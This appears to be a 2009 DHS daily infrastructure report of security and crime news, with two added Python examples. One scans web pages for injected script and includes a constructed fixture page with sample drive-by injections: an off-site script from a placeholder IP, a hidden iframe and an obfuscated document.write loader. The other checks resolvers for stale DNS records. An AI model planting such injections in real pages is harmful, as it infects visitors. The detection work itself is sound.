Department of Homeland Security Daily Open Source Infrastructure Report

Thursday, July 2, 2009

Complete DHS Daily Report for July 2, 2009

Daily Report

Top Stories

 The Dallas Business Journal reports that a man was arrested on June 26 by federal authorities who accuse him of using his contract security guard post at the Carrell Clinic in Dallas, Texas to hack into the clinic’s computers, compromising various hospital systems while planning a larger attack on the system’s computers. (See item 28)

28. June 30, Dallas Business Journal – (Texas) Carrell Clinic computer hacker arrested. An Arlington, Texas, man has been arrested by federal authorities who accuse him of using his contract security guard post at the Carrell Clinic in Dallas to hack into the clinic’s computers, compromising various hospital systems while planning a larger attack on the system’s computers. The defendant, who is also known as the hacker “GhostExodus” and “PhantomExodizzmo” was arrested by the FBI Friday, according to a statement released by the acting U.S. Attorney for the Northern District of Texas. He is charged in the indictment with computer intrusion, but could be facing additional charges depending on the outcome of a grand jury’s investigation, a spokeswoman for the U.S. Attorney’s office said Tuesday. Source:

 According to Knight Ridder, U.S. Navy ships at Mina Salman in Bahrain were the target of an alleged terror attack, prosecutors claimed in a Bahrain court on Tuesday. Two Bahrainis were arrested on April 26 when police allegedly seized machine guns, weapons, computer discs, and other evidence from their homes in East Riffa. (See item 30)

30. July 1, Knight Ridder – (International) Bahrain says two targeted U.S. ships. U.S. Navy ships in Bahrain were the target of an alleged terror attack, prosecutors claimed in court Tuesday. Two Bahrainis, accused of smuggling weapons into the country, planned to attack U.S. ships and personnel at Mina Salman, say prosecutors. The two men, aged 22 and 21, were arrested on April 26 when police allegedly seized machine guns, weapons, computer discs and other evidence from their homes in East Riffa. Both appeared for the first time Tuesday before the High Criminal Court, where they denied plotting terror attacks and smuggling weapons and ammunition into the country. Police believe the pair had met abroad with members of an al-Qaeda terrorist cell. Their arrest came after the National Security Agency received information that the 22-year-old unemployed man, of Jordanian origin, had intensified contacts with the cell in Iran. Officers obtained a search warrant and found tapes, CDs, computers, bank statements and exchange company documents in his house. He then led police to the other man, a 21-year-old junior customs officer, who possessed the smuggled weapons. Source:


Banking and Finance Sector

11. June 30, eWeek – (National) Hacker Max Ray Butler pleads guilty. A notorious hacker pleaded guilty to wire fraud charges June 29, acknowledging his involvement in the theft of credit card and identity data. The guilty party, of San Francisco, was a former security consultant turned hacker who had been on the radar of law enforcement under his various hacker aliases for years. Convicted in 2001 of hacking into the Department of Defense, he served 18 months in prison. In 2004, he was part of a group of individuals investigated by the FBI and the Secret Service for compromising code in the “Half-Life” video game. From 2005 to 2007, the guilty party operated a Website called he set up with a partner-in-crime from Los Angeles, and used it to buy and sell stolen credit card data. The partner would then manufacture credit cards with the stolen card information. Other thieves would use the cards to illegally purchase merchandise that would later be resold on eBay. Investigators linked the ring to the theft of nearly 2 million credit card numbers and $86 million in fraudulent purchases. Source:

12. June 30, Associated Press – (New Jersey) 6 in NJ indicted on mortgage fraud charges. Six people have been indicted on various mortgage fraud-related charges in three separate cases in New Jersey. Among those charged are two women who authorities say used loan application information to obtain more than $1 million in unauthorized mortgages, lines of credit and credit cards. Banks in New Jersey, Pennsylvania and New York were defrauded in the schemes. The New Jersey Attorney General had already filed three civil lawsuits against companies and people it claims were cashing in on the ongoing mortgage crisis. The allegations included charging high fees to homeowners trying to stave off foreclosure. Source:

13. June 30, Associated Press – (Indiana) Ex-pastor sought in Ind. multimillion-dollar fraud. A former pastor and his sons were charged with securities fraud in Indiana on June 30 in what officials said was a multimillion-dollar scheme aimed at church members who thought they were helping build churches but were actually buying the men planes and sports cars. The secretary of state’s office said arrest warrants issued for the ex-pastor and three of his sons charged each with 10 felony counts. The men are accused of duping about 11,000 church members into buying bonds worth $120 million by urging them to support church construction projects, according to a probable cause affidavit. The men said the bonds would be handled by their brokerage firm, Alanar Inc. Prosecutors said the men pocketed about $6 million, bought two airplanes, sports cars and vacations. The ex-pastor also bought Porsches for family members, a spokesman for the Indiana secretary of state said. Most of the men’s victims lived in Indiana. Investigators believe that the men assembled teams of church members to sell bonds to other church members. As the scheme progressed over about five years, the suspects shuffled incoming money between various accounts to hide defaults by churches and their own thefts so they could make scheduled interest payments to investors. Source:

14. June 30, – (National) Juniper pulls ATM hacking presentation from Black Hat. A Juniper Networks Inc. security researcher who planned to demonstrate a way to hack the software of an ATM at the Black Hat Briefings in Las Vegas had his presentation pulled at the request of the ATM vendor. The researcher’s presentation, “Jackpotting Automated Teller Machines,” which was to take place on July 30, was pulled from the schedule on June 29. Juniper Networks confirmed the cancellation. In a statement, the company said it received a request to pull the presentation from an ATM vendor. “Juniper believes that the demonstrator’s research is important to be presented in a public forum in order to advance the state of security. However, the affected ATM vendor has expressed to us concern about publicly disclosing the research findings before its constituents were fully protected,” Juniper said. “Considering the scope and possible exposure of this issue on other vendors, Juniper decided to postpone the researcher’s presentation until all affected vendors have sufficiently addressed the issues found in his research.” The researcher would have demonstrated a way to attack the underlying software of a line of popular new-model ATMs. The presentation would have addressed local and remote attack vectors and finished with a live demonstration on an unmodified stock ATM. The technique differs from the traditional methods of bilking ATMs, which rely on card skimmers or physical theft of the machine rather than attacks on its software. Source:,289142,sid14_gci1360597,00.html

Information Technology

38. June 30, InformationWeek – (International) Zeus Trojan variant steals FTP login details. A new Trojan malware has been detected harvesting FTP account information from compromised computers. The number of affected accounts identified by Prevx, a maker of computer security software, rose from 66,000 on June 24 to 74,000 two days later. According to the director of research at Prevx, the Trojan is highly infectious. “We rate this infection as critical,” he said in a blog post on June 28. “The infection has a ‘China Syndrome’ potential. It includes a cyclic infection which leverages infected PCs to programmatically modify hi-volume Web sites to infect additional users who become part of the cycle. More users leads to more discovery of Web site admin credentials which in turn leads to more Web sites being modified to serve the infection which leads to more infected users.” The malware infects visitors to compromised Web sites using malicious JavaScript code inserted into their pages. The malicious script redirects visitors to Web sites hosting exploit kits, which probe visitors’ computers for vulnerabilities in installed operating systems and applications. If a vulnerability is found and successfully exploited, a variant from the Zeus family of malware is installed. It scans the compromised machine for stored FTP credentials and posts them to a Web server in the Cayman Islands; those credentials are then used to modify further Web sites, so the victim’s own sites become part of the cycle. Source:
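The cycle described above depends on stolen FTP credentials being used to append redirecting script or iframe tags to legitimate pages. A site operator with FTP credentials on a possibly infected workstation would want to check their own content for that kind of insertion. The following is an added example, not code from Prevx or from the report; the page bodies, the host www.example-shop.com, the TEST-NET address 203.0.113.7 and the stats-counter.invalid host are constructed for illustration. It flags script or iframe sources that point off-site, iframes styled to be invisible, unescape-based document.write wrappers, and any markup appended after the closing html tag.

```python
import os
import re
from urllib.parse import urlparse

# Opening <script ...> / <iframe ...> tags and their attribute string.
TAG_RE = re.compile(r'<(script|iframe)\b([^>]*)>', re.I)
SRC_ATTR_RE = re.compile(r'\bsrc\s*=\s*["\']?([^"\'\s>]+)', re.I)
# Attributes that make an iframe invisible, typical of drive-by redirect injections.
HIDDEN_RE = re.compile(
    r'(width\s*=\s*["\']?0\b|height\s*=\s*["\']?0\b|visibility\s*:\s*hidden|display\s*:\s*none)',
    re.I)
# document.write(unescape(...)) and eval(unescape(...)) are common obfuscation wrappers.
OBFUSCATION_RE = re.compile(r'(document\.write|eval)\s*\(\s*unescape\s*\(', re.I)


def _host_of(src):
    parsed = urlparse(src)
    return parsed.hostname.lower() if parsed.hostname else None


def find_injections(html, trusted_hosts):
    """Return a list of (kind, detail) findings for one page body.

    trusted_hosts: hostnames the site legitimately loads script/iframe content from.
    Relative URLs are treated as same-origin and are not reported.
    """
    trusted = {h.lower() for h in trusted_hosts}
    findings = []
    for m in TAG_RE.finditer(html):
        tag, attrs = m.group(1).lower(), m.group(2)
        src_match = SRC_ATTR_RE.search(attrs)
        if not src_match:
            continue  # inline script; covered by the obfuscation check below
        src = src_match.group(1)
        host = _host_of(src)
        if host is not None and host not in trusted:
            findings.append(("offsite_" + tag, src))
        if tag == "iframe" and HIDDEN_RE.search(attrs):
            findings.append(("hidden_iframe", src))
    obf = OBFUSCATION_RE.search(html)
    if obf:
        findings.append(("obfuscated_write", obf.group(0)))
    # Injected code is frequently appended after the closing </html> tag.
    tail = html.lower().rfind("</html>")
    rest = html[tail + len("</html>"):].strip() if tail != -1 else ""
    if rest:
        findings.append(("content_after_html", rest[:60]))
    return findings


def scan_tree(root, trusted_hosts, exts=(".html", ".htm", ".php", ".js")):
    """Walk a web root and return {path: findings} for files that have findings."""
    report = {}
    for dirpath, _, files in os.walk(root):
        for fn in files:
            if fn.lower().endswith(exts):
                path = os.path.join(dirpath, fn)
                with open(path, "r", encoding="utf-8", errors="replace") as fh:
                    hits = find_injections(fh.read(), trusted_hosts)
                if hits:
                    report[path] = hits
    return report


# Constructed sample pages (hypothetical, not taken from the report). The injected
# page appends an off-site script, a hidden iframe and an obfuscated document.write.
CLEAN_PAGE = ('<html><head><script src="/js/site.js"></script></head>'
              '<body><p>Welcome</p>'
              '<script src="https://www.example-shop.com/js/cart.js"></script>'
              '</body></html>')

INJECTED_PAGE = CLEAN_PAGE + (
    '\n<script src="http://203.0.113.7/in.cgi?3"></script>'
    '\n<iframe src="http://stats-counter.invalid/count.php" width="0" height="0" '
    'style="visibility:hidden"></iframe>'
    "\n<script>document.write(unescape('%3Cscript src=%27http://203.0.113.7/x.js"
    "%27%3E%3C/script%3E'));</script>")

if __name__ == "__main__":
    for kind, detail in find_injections(INJECTED_PAGE, ["www.example-shop.com"]):
        print(f"{kind:20} {detail}")
```

Run scan_tree against a checkout of the site's own content with the hosts it really uses as the allowlist; anything off-site or hidden is worth a manual look, and a finding should be followed by changing the FTP password from a machine that is known to be clean, since the report's point is that the infected workstation is where the credential was taken.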

For another story, see item 40 below

Communications Sector

39. June 30, Agence France-Presse – (International) Russia launches U.S. radio satellite: report. Russia successfully launched a U.S. radio satellite from Russia’s Baikonur cosmodrome in Kazakhstan, Russian news agencies reported on June 30. The Proton-M rocket carrying the Sirius-FM5 satellite “successfully blasted off and shortly after placed it on the sub-orbital trajectory,” space officials quoted by Interfax said. The satellite will fully detach from the rocket’s engine block nine hours later, officials added. Source:

40. June 29, The Register – (International) Mitnick site targeted in DNS attack on Web host. A Web site belonging to a security expert was compromised after hackers managed to access a domain name server maintained by the site’s Web host and redirect visitors to pages that displayed pornographic images. It was the second time in the past few years that a security lapse at has allowed hackers to redirect the site, the security expert told The Register. At the time of writing, the domain name system records for Mitnick Security had been restored, but some users continued to see the fraudulent Web site because many DNS resolver caches still held the incorrect records and will keep serving them until those entries expire. The security expert said, “My site was redirected and now this webhosting provider has to rebuild all their customer boxes.” The attackers never gained access to the server hosting the security expert’s site, and in any event, the site did not contain customer lists or other sensitive information, said the security expert. Source:
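When a hijacked record is corrected at the authoritative server, each recursive resolver keeps its cached copy until the TTL it received runs out, which is why visitors behind different resolvers saw different things. The usual check is to query several resolvers directly and compare answers and remaining TTLs. The following is an added example, not code from The Register or from Mitnick Security; it builds a raw DNS A query with the standard library, parses the answer section, and reports which resolvers still disagree with the expected address. The domain example.com, the TEST-NET addresses and the resolver labels in the constructed responses are illustrative; the real lookup function sends UDP to port 53 of whatever resolver address it is given.

```python
import socket
import struct


def build_query(name, txid=0x1234):
    """Standard recursive A query (RD set) for name, as a raw DNS message."""
    header = struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0)
    qname = b"".join(bytes([len(label)]) + label.encode("ascii")
                     for label in name.rstrip(".").split("."))
    return header + qname + b"\x00" + struct.pack("!HH", 1, 1)  # QTYPE A, QCLASS IN


def _read_name(msg, off):
    """Decode a possibly compressed name; return (name, offset after it)."""
    labels, end, jumped = [], None, False
    while True:
        ln = msg[off]
        if ln & 0xC0 == 0xC0:  # compression pointer
            ptr = struct.unpack("!H", msg[off:off + 2])[0] & 0x3FFF
            if not jumped:
                end = off + 2
            jumped, off = True, ptr
            continue
        off += 1
        if ln == 0:
            break
        labels.append(msg[off:off + ln].decode("ascii"))
        off += ln
    return ".".join(labels), (end if end is not None else off)


def parse_a_records(msg):
    """Return [(name, ipv4, ttl)] for the A records in the answer section."""
    _, _, qd, an, _, _ = struct.unpack("!HHHHHH", msg[:12])
    off = 12
    for _ in range(qd):
        _, off = _read_name(msg, off)
        off += 4  # QTYPE + QCLASS
    records = []
    for _ in range(an):
        name, off = _read_name(msg, off)
        rtype, rclass, ttl, rdlen = struct.unpack("!HHIH", msg[off:off + 10])
        off += 10
        rdata = msg[off:off + rdlen]
        off += rdlen
        if rtype == 1 and rclass == 1 and rdlen == 4:
            records.append((name, socket.inet_ntoa(rdata), ttl))
    return records


def query_resolver(resolver_ip, name, timeout=3.0):
    """Ask one specific resolver for the A records of name (needs network access)."""
    q = build_query(name)
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.settimeout(timeout)
        s.sendto(q, (resolver_ip, 53))
        data, _ = s.recvfrom(4096)
    if data[:2] != q[:2]:
        raise ValueError("transaction id mismatch")
    return parse_a_records(data)


def stale_resolvers(answers, expected_ip):
    """answers: {resolver_label: [(name, ip, ttl), ...]} as returned by parse_a_records.

    Returns {resolver_label: seconds} for resolvers whose A set differs from the
    expected address, with the longest TTL they may still serve the old answer.
    """
    stale = {}
    for resolver, recs in answers.items():
        if {ip for _, ip, _ in recs} != {expected_ip}:
            stale[resolver] = max((ttl for _, _, ttl in recs), default=0)
    return stale


def constructed_response(name, ip, ttl, txid=0x1234):
    """Build a response message offline (constructed data, used instead of the network)."""
    q = build_query(name, txid)
    header = struct.pack("!HHHHHH", txid, 0x8180, 1, 1, 0, 0)
    answer = b"\xc0\x0c" + struct.pack("!HHIH", 1, 1, ttl, 4) + socket.inet_aton(ip)
    return header + q[12:] + answer


if __name__ == "__main__":
    # Hypothetical state: authoritative server already corrected, an ISP cache not yet.
    seen = {
        "authoritative": parse_a_records(constructed_response("example.com", "203.0.113.10", 300)),
        "isp-cache": parse_a_records(constructed_response("example.com", "198.51.100.9", 86400)),
    }
    print(stale_resolvers(seen, "203.0.113.10"))
```

In live use, replace the constructed responses with query_resolver calls against the resolvers your users actually sit behind; a resolver listed by stale_resolvers is still handing out the hijacked address and the accompanying number is the upper bound, in seconds, on how long it will keep doing so. Shortening the zone's TTL before any planned change is the preventive version of the same observation.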